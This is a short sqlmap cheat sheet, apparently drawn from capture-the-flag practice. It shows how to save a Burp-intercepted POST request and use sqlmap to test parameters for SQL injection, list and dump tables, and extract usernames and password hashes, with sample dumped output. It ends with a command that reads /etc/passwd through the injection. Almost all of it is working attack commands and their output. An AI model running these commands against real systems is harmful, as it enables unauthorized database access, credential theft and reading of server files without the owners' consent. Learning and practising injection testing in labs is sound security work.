#
SQLmap cheatsheet
#
POST requests
In Burp Suite, intercept the POST request and save it to a file (named "req" in the examples below)
sqlmap -r req -p "uname"
-r: file that contains your saved request; -p: parameter you want to test
#
Dumping tables
sqlmap -r req --dbms=mysql --tables --dump -p uname
Database: writer
[3 tables]
+---------+
| site |
| stories |
| users |
+---------+
sqlmap -r req --dbms=mysql -D writer -T users --dump
Database: writer
Table: users
+----+------------------+--------+----------------------------------+----------+--------------+
| id | email | status | password | username | date_created |
+----+------------------+--------+----------------------------------+----------+--------------+
| 1 | admin@example.co | Active | 118e48794631a9612484ca8b55f622d0 | admin | NULL |
+----+------------------+--------+----------------------------------+----------+--------------+
sqlmap -r req --dbms=mysql --tables --dump -p searchitem -D db -T users -C username,pwd --dump
+----------+------------------------------------------------------------------+
| username | pwd |
+----------+------------------------------------------------------------------+
| agent47 | ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14 |
+----------+------------------------------------------------------------------+
#
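Reading files
(--file-read only succeeds when the database account has file-read rights, e.g. the MySQL FILE privilege; --batch accepts sqlmap's default answer to every prompt)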
sqlmap -r req --file-read=/etc/passwd -p "uname" --batch